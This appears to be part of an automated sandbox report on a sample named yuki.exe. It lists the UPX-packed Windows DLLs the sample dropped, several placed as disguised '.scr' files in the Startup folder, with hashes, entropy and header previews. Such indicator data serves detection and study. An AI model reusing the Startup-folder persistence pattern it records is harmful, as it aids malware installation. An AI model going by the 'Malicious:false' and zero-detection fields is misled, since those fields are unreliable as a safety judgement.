                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.`....... .......0................................................`.............................................X....................@..........................................................@...........................................UPX0..... ..............................UPX1.....`...0...`..................@....rsrc................d..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53248
                                                                                                    Entropy (8bit):7.721350654489589
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:27XSI/nbfB1uNCvj6+wTKq3+fud5uGbl3eEbxVRIMAyGmmIPwDUHuzup/IaMZI9t:2OIbB8ij6+ul+2+sOU2MdwQOKIa
                                                                                                    MD5:2EFE8000A13C0710D776999440F3B47D
                                                                                                    SHA1:7D1418CE2693A44AEE3B49DAD5AFFF3133E3EF67
                                                                                                    SHA-256:9B5FB1B4E1ACF363CB7E4784A64B330A9894AA0D092BAEF932FC5C1CE2E5D095
                                                                                                    SHA-512:1049D61FFB3761348DEBB882B38D2851B7DAC1344268DFD1670876D335C170767D7997EA52DFA37B2F3105C4C8A0840DA725D9BA718DB9A337C919988ABA0F28
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Mi...............pr.....[}......[}......[}......[}.......}......A.......Bp...............}.......}.......}......Rich....................PE..d......g.........." .........0.......Y....................................................`.........................................hv......hs.......p..h...................$........................................e..8...........................................UPX0....................................UPX1................................@....rsrc....0...p...$..................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19456
                                                                                                    Entropy (8bit):7.269415958239344
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yLcGw1KILc8deyxLX5MAk3tHzmMZ+ZpBSTwI771208wGaNhrQZa7gJXcHaKh:S38Lz1lk38MZVV7p20zv8pMHa
                                                                                                    MD5:6254589B12D09495AECB5D2FBEBFBCB6
                                                                                                    SHA1:80C1144EFA85AC367ECFE3CF213F19CE1D0EA8C8
                                                                                                    SHA-256:836BE7E08B3F667AF9F5BA03ACEF2AD3FC62260283F917554E7B62BE05BDA6D7
                                                                                                    SHA-512:19DA23E8D5F496DF86F66226D34D2605956F63F4CEE1E4CD5ADBE974042DBB45CFE98C02EEDA1818C5D6EA52B4C6E63B2DDC97B154E623E003BAA83F12402EC4
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6/5drN[7rN[7rN[7{6.7tN[7 ;Z6vN[796Z6pN[7 ;^6~N[7 ;_6zN[7 ;X6qN[7.;Z6pN[7:.Z6qN[7rNZ7*N[7.;R6sN[7.;[6sN[7.;Y6sN[7RichrN[7................PE..d......g.........." .....@................................................................`.............................................P...`...........`...................8...........................................8...........................................UPX0....................................UPX1.....@.......@..................@....rsrc................D..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):202240
                                                                                                    Entropy (8bit):7.986154952173355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:sL+HY0DZ1geohGKKEfYWE/WPKUjwvk0ozMyHLBHNOUOyGOQsWU72aENk0Ex2fWm0:s6YcbgH8KKEzlKUjwv8prFNPJ7x2Om
                                                                                                    MD5:ACFAD2025CB407E7D7D784E09AA078E6
                                                                                                    SHA1:7D09BA0CF55FA1902F605D12B639152AA60F2C42
                                                                                                    SHA-256:9C29898AED093A5AA939F21D3F715573DA6E67BE05ACEE9DD28457BACB90AB94
                                                                                                    SHA-512:81BBF89367EE5C5EB021206D0C9ECB2037FDDC7DBD38C497CF565AE7671E068D02822781DD05D57202D341083CA9F3B0B4A84DE643960C0D19B10C8C1DE7102D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F...........1....r....I......r.....r.....r.....u......J..u.....u.....u]....u....Rich..........PE..d...j'.f.........." ...(.........@...N...P...................................p............`.........................................lc..\....`..|....`...........3...........c.......................................Z..@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171008
                                                                                                    Entropy (8bit):7.983795993228766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:FXrrMDITptr9HlsXchNBn3PHEwsMq31yJG9l8ffO4wOgTjwFczW:FFp19FsXchXEwsMiys9lG9wFWO
                                                                                                    MD5:2F12DA584A362BAD45C6B9B3DDD2445C
                                                                                                    SHA1:86ADC05435A9A7DC0B0C676456B15F64D7DF6F44
                                                                                                    SHA-256:DA95D86762FB4EA6A479990E1B91591CCAD7D0F88072A7805052CD71168DB115
                                                                                                    SHA-512:6113292936EA39C45764C240E04A92479403EF6C64AA959922E94F990F8D405299793ACBDEB8A4C924D81857E12B3D83E7C8C93C261E8101F4EEE44AB77DC92E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................k...........k.....k.....k.....l......T..l.....l.....ln....l....Rich..................PE..d...d'.f.........." ...(.............E.......................................p............`......................................... c..d....`..0....`...........)...........c.......................................Q..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9728
                                                                                                    Entropy (8bit):6.718987714197854
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:d1UY51IktHYsaMiUBskpKf/otjOPeF7kYBbPJBj34lVhXg246ae7sXtpHqrd3ej7:dL51IkJYevIfKrF7kYj273QJXpHk
                                                                                                    MD5:111EEC367590B8ABB73825FB77232995
                                                                                                    SHA1:54F8A2E4104791420EB39595C8F2EFD0319767D1
                                                                                                    SHA-256:5F2F2122D5DEAF302D0795A0C942F29306350B607AE8E5ABDFC96E08E287B632
                                                                                                    SHA-512:02795230578EFFE140B6ABE1678F700A670345BCE8F6311A35A1458AD2BF57E7D2E94E7D5CE97B2BE8B9E9C62B236F4E305950DD876B7C2D82B554FA191982F5
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d....B.f.........." ..... .......p........................................................`.........................................L..........\............@.........................................................8...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................"..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):7.040912472356204
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:pEbomJb7eLg42ufSAky4s3YeQ807tu/k+RBkYj273QJXbnV/9K:CtqICvor/GBZa7gJXxl
                                                                                                    MD5:3F6E73B2151A1529EF30763ACBD63189
                                                                                                    SHA1:64F8CAA1FA60AF998FA193C632B0598146D74955
                                                                                                    SHA-256:3000A4E4B6D62ED2AA8FC3ACA1BEE21E03D7EEFE961DB8E0872D51F7F8FB094B
                                                                                                    SHA-512:795E07FEA3C2AD3FE665D3CAFFA3263054A4C1AD7D2407EF366E16D4752E1A4F29E1A54372DA582D20C6D7455306E50654AE194285920C1492E756A929C494A2
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..L.......................................................8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):7.0391890721742545
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:VmbomJb7MQtHa66PQrMd/WpKkYj273QJXhnFvk7G9lk:kt46a6ympKZa7gJXvs7G9
                                                                                                    MD5:58FDF64B67A7AF0FEBAFA9BE53094C66
                                                                                                    SHA1:C48F2ECE90211F138F6EE9F3E86F43C56523F1E6
                                                                                                    SHA-256:4B94B9A948C626E34ACCCE67C09524972719E7D82865B6981BF668E976F616F6
                                                                                                    SHA-512:1BD549BAEC3F5AD6FA6976F6F3EFD4531934C25DDCDA0EA4EBF9907468692820BC82A694830DBC2C3F2E22203ABADC98C34B75798C28D55578F00DCED6BE2D5A
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d....B.f.........." .....0.......p..p.....................................................`.........................................L..........\............P..d...................................................p...8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):7.0011330297804975
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:rBj1XDqrH2n4sOK4niou4uiCQxM4kYj273QJXQnII:rTqrymK45oipxM4Za7gJX/
                                                                                                    MD5:BE4016AB120672923BF3C01240B87DF0
                                                                                                    SHA1:9D9D6CB55C738B01FCD71F40715D87A30B440942
                                                                                                    SHA-256:0541E52B4EFA3DD911C14A67A104FE1207EA15A33BB8F94A928395BCA9B32AF2
                                                                                                    SHA-512:E7AEB9DCC8B73334BA1557A75ED11F7A6E016BA6550ED9C63D661B5BB5835490256540759AC4EAF81CBA5CA75F9E1F2CA0FD725C1EA6663CC71A421CBE2D6CA6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d....B.f.........." .....0.......p..P.....................................................`.........................................L..........\............P..(..................................................P...8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17920
                                                                                                    Entropy (8bit):7.446101178202293
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:IfNEwreK8tSUDubR9UHuopYqZa7gJXKK:USnSUDu4pfp6K
                                                                                                    MD5:D4606F55CFDAB1FA41BC4A69AA0F5F91
                                                                                                    SHA1:AA2DADDF5DE23C10687A094DDB792F02CE194BCA
                                                                                                    SHA-256:DF26C8E5052CB05A96D6FAB0824BB4E4C04A10EA45AD3B56DB3FE00B695E7156
                                                                                                    SHA-512:873882F27AE765C14D16EAA71D0828AAE7EC4B831EE6CE8B1F54256D26BB18FBEDE697A4B062791FC3C606EDA42C7A6F580ACBFB71D46A47B73478572006C5B8
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d....B.f.........." .....@..........P........................................ ............`.........................................L...........\...................................................................P...8...........................................UPX0....................................UPX1.....@.......>..................@....rsrc................B..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11264
                                                                                                    Entropy (8bit):7.107511905733802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:d31KyAngDiTMsaxwpQSkKtqH59DzIre69y6ESPIyWTkYj273QJXlEnPVW:SyA8Enayu6oZzIz9y6EIVWTZa7gJX6
                                                                                                    MD5:77EB782D3A1C0BA6134D3C74093058A9
                                                                                                    SHA1:63ADA94954F470C8313AFD1CD1F574B03025903D
                                                                                                    SHA-256:098082E71F5A88F72AA478296D533A6F14F4966DF05DB2DC7014910146BA9C48
                                                                                                    SHA-512:0C73FC80BD8F39661C4A2EF00F13C840B2CE7DF1D5BE02AD1294A5ABF256D2097AE940ADB9B7F76B9405DC9CF0D7E639AAD343A920C407C73A2DA80632CA639E
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P.........................................................8...........................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):7.098557957232658
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:UHRdBLsPZK1vko/1NzFXHDLAN4RzV/uKZ0lkYj273QJXWH5A:UHxsivPTzF3DLNPuu0lZa7gJX0A
                                                                                                    MD5:0072BBD2B1AAA845C289884C3FC3E6CA
                                                                                                    SHA1:77CD6EACB83F5B437AF07F2B83210063601816C8
                                                                                                    SHA-256:784751702CCAEE36641973C5B40990993341AA0FB42B45526930DC9823B14D21
                                                                                                    SHA-512:5C55BDB0558856C57E2FA9577B7DB3807518D2B3F78D97D28FFFE3F5739820C72870FE70847CFF4179C589E9023F4817DFBEA6909CDED54CEE45E9EDCF2FC8F1
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0...............................................................`.........................................L...........\............`.........................................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15360
                                                                                                    Entropy (8bit):7.366223813929065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vcwvnyaqcefIn88uRQ/dIVrrnFqrFCJZZoXuns0kYj273QJXtnbR:vzfvuRKIdi6ZZo+ns0Za7gJXlR
                                                                                                    MD5:3AAFD580A6EB129D6FA81676AEDC17AF
                                                                                                    SHA1:15DFCFF1E1E11036367E4AB9D5CD5B90345755E9
                                                                                                    SHA-256:8035581ED2F8BD52C747EE78E8739C9353C00020A7CF6B352B91741B2D83E2A0
                                                                                                    SHA-512:6B495102EA73104AF6274590B908622130CD41831EF56E3C14866A4639408791FA005015211CB9F25A13DADF5D85EDCBE289C9388F633364AB7EB92089572712
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....@................................................................`.........................................L...........\............p..........................................................8...........................................UPX0....................................UPX1.....@.......4..................@....rsrc................8..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):7.554966136100124
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:C9OoXmDJJfsg/XTsJaMEgotWVKOVBVvHQ5X565Za7gJX0p:FoXqnVXTs/r95VBVf+Xepkp
                                                                                                    MD5:08A7EA5BDD9625047E4A4F8D8AA0F72D
                                                                                                    SHA1:2D8FE0117A8F3B8DBEB543F8DFDE3B6BA8895BEA
                                                                                                    SHA-256:D2781BCAB61C2C92C308AA09BD1779B58C244D76F6BBE5752990290E14D78C6C
                                                                                                    SHA-512:CD7688381BFA1297C1A224DBA9BEB77FEE3F8E158C088B2D2E9F8BF6C7B5EDC962395264D6C64E23CF270F8300111506B51704F6DEBB5ABB676A2AC988865775
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d....B.f.........." .....P................................................................`.........................................L...........\.......................................................................8...........................................UPX0....................................UPX1.....P.......H..................@....rsrc................L..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.763072209111107
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:jrOwIMFi0ZIPRKLZm2HIKI7FojkYj273QJX93qz:jrKMFiFKLZzHILojZa7gJXA
                                                                                                    MD5:E116F8C6A7376154E6610A6B9BBD7D87
                                                                                                    SHA1:482465FD942B06A3149149B0A16B9EBADCD19065
                                                                                                    SHA-256:6A44880996AEBA9B04ACF3383E9A5ACC93682FE66644A9E2BC3EA5DEFC08E09B
                                                                                                    SHA-512:EB5297B05C18F1DABB3426928D8431A7113390398C5D135C0DA1E21B8F9CDE3B0A3925DECEACB68AB488E85ACECA31660B49EBD8E67C991891CC93BB235FF7D5
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." ..... .......p..@.....................................................`.........................................L..........\............P..X...................................................@...8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.915600305133218
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:kQjcBJuphELbARkRzWJ9v07xyhAEkxWkYj273QJXXnYvo:E/ACRzcvW2AEUWZa7gJXA
                                                                                                    MD5:8257838724A8517ACA79B0B8D8147E8E
                                                                                                    SHA1:454E4080DD7A522C11B76A21D6BA74047BBEFD6B
                                                                                                    SHA-256:D4DFB84D0ABD477A3CDE6EC9CC66C5156F2FD5F32E526A2C54F1C14A69A60EB3
                                                                                                    SHA-512:010630578D001D863A4BBE556094FD48C4ACB30EF7B5372E6CAE908B731D1C206FAFA814DFE1EE6E07B5BE1366B2DBBE5CA163D15C0FB0BA87E68A60526934B0
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..d.......................................................8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11264
                                                                                                    Entropy (8bit):6.899588298720918
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vWNPs19OtUVkzxt8b3jKdr7ag3qkYj273QJX1n2P:vyo9OtPGbGd3ag3qZa7gJXk
                                                                                                    MD5:D9AA56216FD9B7443B5431E3964668F3
                                                                                                    SHA1:4B669A98DD70CC364ADFCA2A6A5BB00986F8FA19
                                                                                                    SHA-256:06B9A3AC04E09F51296261F1E3178DEE84038FEA11A33EFC76E71430506BDFD7
                                                                                                    SHA-512:6A497C25309C1E233375DF92ED7CB3E680371D4CE07A7F8B96F70C84565FDD07E81E6F93DFB083DE8D7E6DD38302DE4A478D95D7C5016D6301E81FED4FF908CB
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..........................................................8...........................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17408
                                                                                                    Entropy (8bit):7.45225908924745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ybXqmPF0yHaseAZ2OC4uCDeR0IjhP6nZa7gJXQ:YXPajsw41GjjYpg
                                                                                                    MD5:5B340FAC8A1C1FE8A60598B329EB55DB
                                                                                                    SHA1:0BB5614EE50C6DE644D6D3A45568AD8913414316
                                                                                                    SHA-256:D8B05D5ACAECCB1679E548EECB82692230F295D51615A7036B59D70201E466C4
                                                                                                    SHA-512:0D25C288343138F158320B55A77F06421AE76DE2539C287519144CEF5420AAA803D88443B9D1FD691B44868A2E527C8152A1783DEAA0E8D9904796E177FFB68A
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d....B.f.........." .....@...........M... ...................................p............`.........................................Lb.......`..\....`..........l............b.......................................Y..8...........................................UPX0....................................UPX1.....@... ...<..................@....rsrc........`.......@..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17408
                                                                                                    Entropy (8bit):7.5271086900297135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:pXqvtGBvrj1exl5PSYSI5SFDzgJ+LZa7gJXn:py0BTMgYFAFD8JSpX
                                                                                                    MD5:E62B025849868F0DCDEF72FF46C8C5FF
                                                                                                    SHA1:A141CD9054FFB82F69B392FC92D21D1528F419F2
                                                                                                    SHA-256:86A007FE978C6F79720DA81208FDFD1985BD6DCA4EC18D318EA671FEF466F5B7
                                                                                                    SHA-512:BE9DEDD887A091C7959D2E7AC49DD8FC82C88ADABC8909A3D294695C9C1E3653DD13215C75AFC3CF82206B0B570CFFABC48DD004D47DFF72D061EB34C46765F0
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d....B.f.........." .....@...........N... ...................................p............`.........................................Lb.......`..\....`.......................b.......................................Z..8...........................................UPX0....................................UPX1.....@... ...<..................@....rsrc........`.......@..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9216
                                                                                                    Entropy (8bit):6.748613710874415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:P51jwkl3nSW/ZHd8M/retkYj273QJXpHz:P5CkwWtSMDetZa7gJXZ
                                                                                                    MD5:5CA4837FC45CD28F290B54BD2E0A67F5
                                                                                                    SHA1:8AAEE26A61A0945DDAFFDBF9FD2A87272EEB8822
                                                                                                    SHA-256:77ECE4EFFAE2152C6B2E70945CE0779B95B5CA8ECD29B3A6E857B95461399534
                                                                                                    SHA-512:D6F0D2B572CC770D8C452D4D2DF575C3B988DC6490A506C5602AB4599E88502E1555F5C1AF33582295380C9E56D46FF9CCDE9A5DBA61776958173ECE4C1C64C6
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d....B.f.........." ..... .......p........................................................`.................................................................@..........................................................8...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................ ..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15872
                                                                                                    Entropy (8bit):7.388461503699212
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:bzW51OWrPlPXRWkplBxnEgTiD+Za7gJXaf:bzW51O4lPBJpTLTiCpq
                                                                                                    MD5:8646BD937418C50B42D7582DBFF2002C
                                                                                                    SHA1:6A4597A720AC1898712E4B94855A700B7E905E55
                                                                                                    SHA-256:394B2281FC1445195B31777C46EA58E23073B9228F791E0619B0B762F09A2E29
                                                                                                    SHA-512:FDF8BF1A01DA4ABFBF0426BBC3E7AD6988C81FBB65D9B28EAC0FBE09E6CDC225F2FF2D4BD66938B7DC73978968AC39564FD6EE4E8EA566689DF0A0A82E27B561
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....@...............................................................`.........................................L...........\............p..........................................................8...........................................UPX0....................................UPX1.....@.......6..................@....rsrc................:..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
